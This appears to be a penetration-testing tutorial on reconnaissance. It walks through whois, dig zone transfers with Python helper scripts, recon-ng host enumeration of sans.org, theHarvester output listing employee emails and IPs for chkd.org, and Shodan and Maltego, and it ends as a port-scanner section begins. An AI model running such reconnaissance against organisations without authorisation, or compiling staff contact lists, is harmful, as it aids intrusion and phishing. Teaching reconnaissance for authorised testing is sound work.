 Server Name: YAHOO.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
 IP Address: 69.41.185.196
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.ZZZZZZ.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.ZZZZZZZ.GET.ONE.MILLION.DOLLARS.AT.WWW.UNIMUNDI.COM
 IP Address: 209.126.190.70
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Domain Name: YAHOO.COM
 Registrar: MARKMONITOR INC.
 Sponsoring Registrar IANA ID: 292
 Whois Server: whois.markmonitor.com
 Referral URL: http://www.markmonitor.com
 Name Server: NS1.YAHOO.COM
 Name Server: NS2.YAHOO.COM
 Name Server: NS3.YAHOO.COM
 Name Server: NS4.YAHOO.COM
 Name Server: NS5.YAHOO.COM
 Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
 Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
 Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
 Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
 Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
 Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
 Updated Date: 26-aug-2015
 Creation Date: 18-jan-1995
 Expiration Date: 19-jan-2023

>>> Last update of whois database: Fri, 28 Oct 2016 17:56:10 GMT <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: yahoo.com
Registry Domain ID: 3643624_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-08-26T15:30:44-0700
Creation Date: 1995-01-18T00:00:00-0800
Registrar Registration Expiration Date: 2023-01-18T21:00:00-0800
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: Yahoo! Inc.
Registrant Street: 701 First Avenue
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94089
Registrant Country: US
Registrant Phone: +1.4083493300
Registrant Phone Ext:
Registrant Fax: +1.4083493301
Registrant Fax Ext:
Registrant Email: domainadmin@yahoo-inc.com
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: Yahoo! Inc.
Admin Street: 701 First Avenue
Admin City: Sunnyvale
Admin State/Province: CA
Admin Postal Code: 94089
Admin Country: US
Admin Phone: +1.4083493300
Admin Phone Ext:
Admin Fax: +1.4083493301
Admin Fax Ext:
Admin Email: domainadmin@yahoo-inc.com
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: Yahoo! Inc.
Tech Street: 701 First Avenue
Tech City: Sunnyvale
Tech State/Province: CA
Tech Postal Code: 94089
Tech Country: US
Tech Phone: +1.4083493300
Tech Phone Ext:
Tech Fax: +1.4083493301
Tech Fax Ext:
Tech Email: domainadmin@yahoo-inc.com
Name Server: ns4.yahoo.com
Name Server: ns2.yahoo.com
Name Server: ns1.yahoo.com
Name Server: ns5.yahoo.com
Name Server: ns3.yahoo.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-10-28T10:52:20-0700 <<<

The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for
information purposes, and to assist persons in obtaining information about or
related to a domain name registration record. MarkMonitor.com does not guarantee
its accuracy. By submitting a WHOIS query, you agree that you will use this Data
only for lawful purposes and that, under no circumstances will you use this Data to:
 (1) allow, enable, or otherwise support the transmission of mass unsolicited,
 commercial advertising or solicitations via e-mail (spam); or
 (2) enable high volume, automated, electronic processes that apply to
 MarkMonitor.com (or its systems).
MarkMonitor.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

MarkMonitor is the Global Leader in Online Brand Protection.

MarkMonitor Domain Management(TM)
MarkMonitor Brand Protection(TM)
MarkMonitor AntiPiracy(TM)
MarkMonitor AntiFraud(TM)
Professional and Managed Services

Visit MarkMonitor at http://www.markmonitor.com
Contact us at +1.8007459229
In Europe, at +44.02032062220

For more information on Whois status codes, please visit
 https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en

Dig

Domain Internet Groper

Options:

root@DESKTOP-7ETQJM7:~# dig -h
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
 {global-d-opt} host [@local-server] {local-d-opt}
 [ host [@local-server] {local-d-opt} [...]]
Where: domain is in the Domain Name System
 q-class is one of (in,hs,ch,...) [default: in]
 q-type is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
 (Use ixfr=version for type ixfr)
 q-opt is one of:
 -x dot-notation (shortcut for reverse lookups)
 -i (use IP6.INT for IPv6 reverse lookups)
 -f filename (batch mode)
 -b address[#port] (bind to source address/port)
 -p port (specify port number)
 -q name (specify query name)
 -t type (specify query type)
 -c class (specify query class)
 -k keyfile (specify tsig key file)
 -y [hmac:]name:key (specify named base64 tsig key)
 -4 (use IPv4 query transport only)
 -6 (use IPv6 query transport only)
 -m (enable memory usage debugging)
 d-opt is of the form +keyword[=value], where keyword is:
 +[no]vc (TCP mode)
 +[no]tcp (TCP mode, alternate syntax)
 +time=### (Set query timeout) [5]
 +tries=### (Set number of UDP attempts) [3]
 +retry=### (Set number of UDP retries) [2]
 +domain=### (Set default domainname)
 +bufsize=### (Set EDNS0 Max UDP packet size)
 +ndots=### (Set NDOTS value)
 +[no]edns[=###] (Set EDNS version) [0]
 +[no]search (Set whether to use searchlist)
 +[no]showsearch (Search with intermediate results)
 +[no]defname (Ditto)
 +[no]recurse (Recursive mode)
 +[no]ignore (Don't revert to TCP for TC responses.)
 +[no]fail (Don't try next server on SERVFAIL)
 +[no]besteffort (Try to parse even illegal messages)
 +[no]aaonly (Set AA flag in query (+[no]aaflag))
 +[no]adflag (Set AD flag in query)
 +[no]cdflag (Set CD flag in query)
 +[no]cl (Control display of class in records)
 +[no]cmd (Control display of command line)
 +[no]comments (Control display of comment lines)
 +[no]rrcomments (Control display of per-record comments)
 +[no]question (Control display of question)
 +[no]answer (Control display of answer)
 +[no]authority (Control display of authority)
 +[no]additional (Control display of additional)
 +[no]stats (Control display of statistics)
 +[no]short (Disable everything except short
 form of answer)
 +[no]ttlid (Control display of ttls in records)
 +[no]all (Set or clear all display flags)
 +[no]qr (Print question before sending)
 +[no]nssearch (Search all authoritative nameservers)
 +[no]identify (ID responders in short answers)
 +[no]trace (Trace delegation down from root [+dnssec])
 +[no]dnssec (Request DNSSEC records)
 +[no]nsid (Request Name Server ID)
 +[no]sigchase (Chase DNSSEC signatures)
 +trusted-key=#### (Trusted Key when chasing DNSSEC sigs)
 +[no]topdown (Do DNSSEC validation top down mode)
 +[no]split=## (Split hex/base64 fields into chunks)
 +[no]multiline (Print records in an expanded format)
 +[no]onesoa (AXFR prints only one soa record)
 +[no]keepopen (Keep the TCP socket open between queries)
 global d-opts and servers (before host name) affect all queries.
 local d-opts and servers (after host name) affect only that lookup.
 -h (print help and exit)
 -v (print version and exit)

My favorite dig option is axfr, which requests a zone transfer. Zone transfers are the DNS transaction used to replicate records between a primary server and its secondaries. It’s rare these days to find a DNS server that allows a zone transfer to an arbitrary client, but it’s something you should check. If you succeed in performing a zone transfer, you will have every DNS record for the domain.

Example: dig axfr @dns-server domain.name
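To turn that one-off command into a repeatable check for your own zones, here is an added example (my code, not part of the original post) that asks dig for a zone’s NS records, attempts an AXFR against each server and reports which ones answer. It assumes dig is on your PATH; the two dig outputs embedded in it are constructed samples, and example.com is only a placeholder for whatever zone you pass on the command line.

```python
#!/usr/bin/env python3
"""Check whether a zone's authoritative name servers hand out a full zone
transfer (AXFR) to an arbitrary client.  Added example that wraps
'dig axfr ZONE @NS' and parses dig's text output."""
import subprocess
import sys

DIG = "dig"  # assumed to be on PATH

# Constructed sample: what dig prints when a server permits the transfer.
SAMPLE_TRANSFER = """; <<>> DiG 9.10.3-P4 <<>> axfr example.com @ns1.example.com
;; global options: +cmd
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2016102801 7200 3600 1209600 3600
example.com.\t\t3600\tIN\tNS\tns1.example.com.
www.example.com.\t3600\tIN\tA\t192.0.2.10
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2016102801 7200 3600 1209600 3600
;; Query time: 2 msec
;; SERVER: 192.0.2.53#53(192.0.2.53)
;; XFR size: 4 records (messages 1, bytes 180)
"""

# Constructed sample: what dig prints when the server refuses.
SAMPLE_REFUSED = """; <<>> DiG 9.10.3-P4 <<>> axfr example.com @ns2.example.com
;; global options: +cmd
; Transfer failed.
"""


def parse_dig_records(output):
    """Return dig's answer as (name, ttl, class, type, rdata) tuples.

    Comment lines (starting with ';') and blank lines are skipped, so a refused
    transfer, which prints only comments, yields an empty list.
    """
    records = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)
        if len(parts) < 4:
            continue  # not a resource record line
        name, ttl, rclass, rtype = parts[:4]
        rdata = parts[4] if len(parts) == 5 else ""
        records.append((name, ttl, rclass, rtype, rdata))
    return records


def transfer_allowed(output):
    """A completed AXFR carries the zone's SOA record (dig prints it at the
    start and end unless +onesoa is used); a refusal or timeout carries none."""
    return any(r[3] == "SOA" for r in parse_dig_records(output))


def try_axfr(zone, nameserver):
    """Run the dig axfr command from the text above and classify its result.
    Needs network access; +time/+tries keep an unresponsive server from stalling."""
    cmd = [DIG, "+time=5", "+tries=1", "axfr", zone, "@" + nameserver]
    out = subprocess.run(cmd, capture_output=True, text=True).stdout
    return transfer_allowed(out), parse_dig_records(out)


def authoritative_servers(zone):
    """NS names for the zone, via 'dig +short NS ZONE' (network access)."""
    out = subprocess.run([DIG, "+short", "NS", zone], capture_output=True, text=True).stdout
    return [ns.rstrip(".") for ns in out.split()]


if __name__ == "__main__":
    zone = sys.argv[1] if len(sys.argv) > 1 else "example.com"  # placeholder zone
    for ns in authoritative_servers(zone):
        allowed, records = try_axfr(zone, ns)
        status = "ALLOWS AXFR (%d records)" % len(records) if allowed else "refuses AXFR"
        print("%-30s %s" % (ns, status))
```

Any server that comes back as allowing the transfer is handing your whole zone to anyone who asks; on BIND that is fixed with an allow-transfer statement restricted to your secondaries, ideally keyed with TSIG (the -k and -y options in the dig help above are the client side of that).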

Recon-ng

https://bitbucket.org/LaNMaSteR53/recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

If you know how to use Metasploit, you should feel right at home using recon-ng. You can even automate recon-ng using resource files like you can with Metasploit.

Some modules are passive (they never touch the target network), while others probe the target directly, and a few can even attack the system you are targeting, so check what a module does before running it.

To install recon-ng in Kali, enter the command:

apt-get update && apt-get install recon-ng

At each level in recon-ng you can get help by typing the help and show commands.

[recon-ng][default] > help

Commands (type [help|?] <topic>):
---------------------------------
add Adds records to the database
back Exits the current context
delete Deletes records from the database
exit Exits the framework
help Displays this menu
keys Manages framework API keys
load Loads specified module
pdb Starts a Python Debugger session
query Queries the database
record Records commands to a resource file
reload Reloads all modules
resource Executes commands from a resource file
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
spool Spools output to a file
unset Unsets module options
use Loads specified module
workspaces Manages workspaces

[recon-ng][default] > show
Shows various framework items

Usage: show [banner|companies|contacts|credentials|dashboard|domains|hosts|keys|leaks|locations|modules|netblocks|options|ports|profiles|pushpins|repositories|schema|vulnerabilities|workspaces]

Recon-ng uses the concept of workspaces to organize targets. To add a workspace, use “workspaces add <workspaceName>”. The prompt will change from “default” to display the current workspace.

[recon-ng][default] > workspaces add demo

In the new workspace, add a company and domain:

[recon-ng][demo] > add companies
company (TEXT): SANS
description (TEXT): SANS
[recon-ng][demo] > add domains
domain (TEXT): sans.org

Full list of modules:

[recon-ng][default] > show modules

 Discovery
 ---------
 discovery/info_disclosure/cache_snoop
 discovery/info_disclosure/interesting_files

 Exploitation
 ------------
 exploitation/injection/command_injector
 exploitation/injection/xpath_bruter

 Import
 ------
 import/csv_file
 import/list

 Recon
 -----
 recon/companies-contacts/bing_linkedin_cache
 recon/companies-contacts/indeed
 recon/companies-contacts/jigsaw/point_usage
 recon/companies-contacts/jigsaw/purchase_contact
 recon/companies-contacts/jigsaw/search_contacts
 recon/companies-contacts/linkedin_auth
 recon/companies-multi/github_miner
 recon/companies-multi/whois_miner
 recon/contacts-contacts/mailtester
 recon/contacts-contacts/mangle
 recon/contacts-contacts/unmangle
 recon/contacts-credentials/hibp_breach
 recon/contacts-credentials/hibp_paste
 recon/contacts-domains/migrate_contacts
 recon/contacts-profiles/fullcontact
 recon/credentials-credentials/adobe
 recon/credentials-credentials/bozocrack
 recon/credentials-credentials/hashes_org
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts
 recon/hosts-hosts/bing_ip
 recon/hosts-hosts/freegeoip
 recon/hosts-hosts/ipinfodb
 recon/hosts-hosts/resolve
 recon/hosts-hosts/reverse_resolve
 recon/hosts-hosts/ssltools
 recon/hosts-locations/migrate_hosts
 recon/hosts-ports/shodan_ip
 recon/locations-locations/geocode
 recon/locations-locations/reverse_geocode
 recon/locations-pushpins/flickr
 recon/locations-pushpins/instagram
 recon/locations-pushpins/picasa
 recon/locations-pushpins/shodan
 recon/locations-pushpins/twitter
 recon/locations-pushpins/youtube
 recon/netblocks-companies/whois_orgs
 recon/netblocks-hosts/reverse_resolve
 recon/netblocks-hosts/shodan_net
 recon/netblocks-ports/census_2012
 recon/netblocks-ports/censysio
 recon/ports-hosts/migrate_ports
 recon/profiles-contacts/dev_diver
 recon/profiles-contacts/github_users
 recon/profiles-profiles/namechk
 recon/profiles-profiles/profiler
 recon/profiles-profiles/twitter_mentioned
 recon/profiles-profiles/twitter_mentions
 recon/profiles-repositories/github_repos
 recon/repositories-profiles/github_commits
 recon/repositories-vulnerabilities/gists_search
 recon/repositories-vulnerabilities/github_dorks

 Reporting
 ---------
 reporting/csv
 reporting/html
 reporting/json
 reporting/list
 reporting/pushpin
 reporting/xlsx
 reporting/xml

Striker Security has published an excellent guide to recon-ng modules. Get it here: https://strikersecurity.com/pdfs/recon-ng-guide.pdf

Instead of viewing the full list of modules, you can search for them.

[recon-ng][demo] > search domains
[*] Searching for 'domains'...

 Recon
 -----
 recon/contacts-domains/migrate_contacts
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts

To use a module, enter “use <full path to module>”. Recon-ng offers tab completion, so you can type a partial path and hit the tab key to complete each section of the path between slashes. Once you’ve entered a module, use “show info” to find module info and required parameters.

[recon-ng][demo][shodan_hostname] > use recon/domains-hosts/bing_domain_web
[recon-ng][demo][bing_domain_web] > show info

 Name: Bing Hostname Enumerator
 Path: modules/recon/domains-hosts/bing_domain_web.py
 Author: Tim Tomes (@LaNMaSteR53)

Description:
 Harvests hosts from Bing.com by using the 'site' search operator. Updates the 'hosts' table with the
 results.

Options:
 Name Current Value Required Description
 ------ ------------- -------- -----------
 SOURCE default yes source of input (see 'show info' for details)

Source Options:
 default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
 <string> string representing a single input
 <path> path to a file containing a list of inputs
 query <sql> database query returning one column of inputs

[recon-ng][demo][bing_domain_web] >

To start the module, enter “run”.

[recon-ng][demo][bing_domain_web] > run

--------
SANS.ORG
--------
[*] URL: https://www.bing.com/search?first=0&q=domain%3Asans.org
[*] [host] files.sans.org (<blank>)
[*] [host] labs.sans.org (<blank>)
[*] [host] www.sans.org (<blank>)
[*] [host] cyber-defense.sans.org (<blank>)
[*] [host] redmine.sans.org (<blank>)
[*] [host] securingthehuman.sans.org (<blank>)
[*] [host] software-security.sans.org (<blank>)
[*] [host] lists.sans.org (<blank>)
[*] [host] access.sans.org (<blank>)
[*] [host] digital-forensics.sans.org (<blank>)
[*] [host] sic.sans.org (<blank>)
[*] [host] uk.sans.org (<blank>)
[*] [host] ics.sans.org (<blank>)
[*] [host] pen-testing.sans.org (<blank>)
[*] [host] qms.sans.org (<blank>)
[*] [host] handlers.sans.org (<blank>)
[*] Sleeping to avoid lockout...

Now let’s check out the new hosts added to the database.

[recon-ng][demo][bing_domain_web] > show hosts

 +---------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +---------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
 | 5 | redmine.sans.org | | | | | | bing_domain_web |
 | 6 | securingthehuman.sans.org | | | | | | bing_domain_web |
 | 7 | software-security.sans.org | | | | | | bing_domain_web |
 | 8 | lists.sans.org | | | | | | bing_domain_web |

(cropped for brevity)

Let’s try a different module then take another look at the hosts.

[recon-ng][demo][bing_domain_web] > search shodan
[*] Searching for 'shodan'...

 Recon
 -----
 recon/domains-hosts/shodan_hostname
 recon/hosts-ports/shodan_ip
 recon/locations-pushpins/shodan
 recon/netblocks-hosts/shodan_net

[recon-ng][demo][bing_domain_web] > use recon/domains-hosts/shodan_hostname
[recon-ng][demo][shodan_hostname] > run

--------
SANS.ORG
--------
[*] Searching Shodan API for: hostname:sans.org
[*] [port] 204.51.94.14 (25/<blank>) - smtp31b.sans.org
[*] [host] smtp31b.sans.org (204.51.94.14)
[*] [port] 66.35.59.19 (80/<blank>) - web23a.den.sans.org
[*] [host] web23a.den.sans.org (66.35.59.19)
[*] [port] 66.35.59.8 (53/<blank>) - dns21b.sans.org
[*] [host] dns21b.sans.org (66.35.59.8)
(cropped for brevity)

[recon-ng][demo][shodan_hostname] > show hosts

 +--------------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +--------------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
(cropped for brevity)
 | 42 | smtp31b.sans.org | 204.51.94.14 | | | | | shodan_hostname |
 | 43 | web23a.den.sans.org | 66.35.59.19 | | | | | shodan_hostname |
 | 44 | dns21b.sans.org | 66.35.59.8 | | | | | shodan_hostname |
 | 45 | admin.sans.org | 204.51.94.215 | | | | | shodan_hostname |
 | 46 | 204-51-94-246.clp.sans.org | 204.51.94.246 | | | | | shodan_hostname |
 | 47 | labs.sans.org | 204.51.94.233 | | | | | shodan_hostname |


theHarvester

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization. Source: https://code.google.com/p/theharvester/

┌─[kali]─[~]
└──> theharvester -d chkd.org -b all -e chsext1.chkd.org

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
 Searching 0 results...
 Searching 100 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
 Searching 50 results...
 Searching 100 results...
[-] Searching in Exalead..
 Searching 50 results...
 Searching 100 results...
 Searching 150 results...


[+] Emails found:
------------------
+john.harrington@chkd.org
ASampson@chkd.org
Amy.Sampson@chkd.org
Amy@chkd.org
Barbara.Benson@chkd.org
Beach@chkd.org
Beverly.Jacobson@chkd.org
(cropped for brevity)
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs... 
92.242.140.21:2Fwww.chkd.org
208.255.163.169:apihrp.chkd.org
157.21.35.200:kdmedia.chkd.org
208.255.163.168:mekids.chkd.org
208.255.163.189:webmail.chkd.org
208.255.163.163:www.chkd.org
[+] Virtual hosts:
==================
208.255.163.169 apihrp.chkd.org
157.21.35.200 kdmedia.chkd.org
208.255.163.189 webmail.chkd.org
208.255.163.163 www.chkd.org
208.255.163.163 208.255.163.163

Network-tools.com

This site offers a number of web-based tools, including:

Express
Ping
Trace
Whois (IDN Conversion Tool)
DNS Records (Advanced Tool)
Network Lookup
Spam Blacklist Check
URL Decode
URL Encode
HTTP Headers SSL
Email Tests

One of the tools I find useful on this site is Network Lookup. Enter an IP address or domain name and it will show the network address/range, which is useful for finding the IP address ranges owned by the target to include in active scans. This is the output of running “Network Lookup” on www.sans.org:

NetRange: 66.35.59.0 - 66.35.59.255
CIDR: 66.35.59.0/24
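Once you have the netblocks, it is worth mapping the hosts you collected back onto them. Here is an added example (my code, not part of the original post) that takes host/IP pairs of the kind recon-ng’s hosts table holds and sorts them into the ranges an organization owns, reporting any host that resolves somewhere else. The 66.35.59.0/24 range and the first five host/IP pairs come from the output above; the 204.51.94.0/24 range and the last host are constructed placeholders.

```python
#!/usr/bin/env python3
"""Group discovered hosts by owned netblock and list the ones outside every
block.  Added example using only the standard library."""
import ipaddress
from collections import defaultdict

# (hostname, ip) pairs as recon-ng's hosts table shows them.  The first five
# are from the shodan_hostname output above; the last one is constructed.
DISCOVERED_HOSTS = [
    ("smtp31b.sans.org", "204.51.94.14"),
    ("web23a.den.sans.org", "66.35.59.19"),
    ("dns21b.sans.org", "66.35.59.8"),
    ("admin.sans.org", "204.51.94.215"),
    ("labs.sans.org", "204.51.94.233"),
    ("placeholder.sans.org", "203.0.113.7"),  # constructed: lives on someone else's range
]

# 66.35.59.0/24 is the Network Lookup result above; 204.51.94.0/24 is a
# constructed placeholder standing in for a second lookup.
OWNED_NETBLOCKS = ["66.35.59.0/24", "204.51.94.0/24"]


def classify_hosts(hosts, netblocks):
    """Return ({netblock: [hostnames]}, [(hostname, ip) outside every netblock]).

    strict=True makes ipaddress reject a block with host bits set (e.g. a
    mistyped 66.35.59.5/24) instead of silently masking it.
    """
    nets = [ipaddress.ip_network(n, strict=True) for n in netblocks]
    in_range = defaultdict(list)
    out_of_range = []
    for name, ip in hosts:
        addr = ipaddress.ip_address(ip)
        for net in nets:
            if addr in net:
                in_range[str(net)].append(name)
                break
        else:  # no block matched
            out_of_range.append((name, ip))
    return dict(in_range), out_of_range


def report(hosts, netblocks):
    """Human-readable summary; returns the lines so callers can log them."""
    in_range, out_of_range = classify_hosts(hosts, netblocks)
    lines = []
    for net in netblocks:
        names = in_range.get(net, [])
        lines.append("%s: %d host(s) %s" % (net, len(names), ", ".join(sorted(names))))
    for name, ip in out_of_range:
        lines.append("OUTSIDE owned ranges: %s -> %s" % (name, ip))
    return lines


if __name__ == "__main__":
    for line in report(DISCOVERED_HOSTS, OWNED_NETBLOCKS):
        print(line)
```

The in-range groups tell you which blocks are worth scanning; the out-of-range list is the one a defender should read first, since a name under your domain pointing at address space you do not control is either a third-party service you should know about or a stale record.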

Netcraft Toolbar

http://toolbar.netcraft.com/site_report

This site is useful to see what technology a website is running.

SiteDigger

http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SiteDigger 3.0 searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.


Shodan.io

https://www.shodan.io/

The search engine for the Internet of Things

Think of Shodan as a search engine that returns results that include the banner of a site or device. Want to find open vulnerable sites, VNC servers, IoT devices, webcams that don’t require authentication and allow you to waste hours of your day? You can also use shodan to generate a list of target IP addresses, export the list, and import into your security tool of choice.

You can find a free guide to Shodan on exploit-db.com: https://www.exploit-db.com/docs/33859.pdf

Maltego

Maltego Community Edition is pre-installed in Kali Linux.

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet. Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis.

Currently there are three versions of the Maltego client namely Maltego CE, Maltego Classic and Maltego XL. This page will focus on Maltego Community Edition (CE). All three Maltego clients come with access to a library of standard transforms for the discovery of data from a wide range of public sources that are commonly used in online investigations and digital forensics.

Port scan and grab banners in Python

Just a simple port scanner and banner grabber written in Python. I made it because I didn’t have admin privs to install nmap at the time because I was a new employee < 90 days and I wanted to sharpen my Python skills and find out if that port was open.

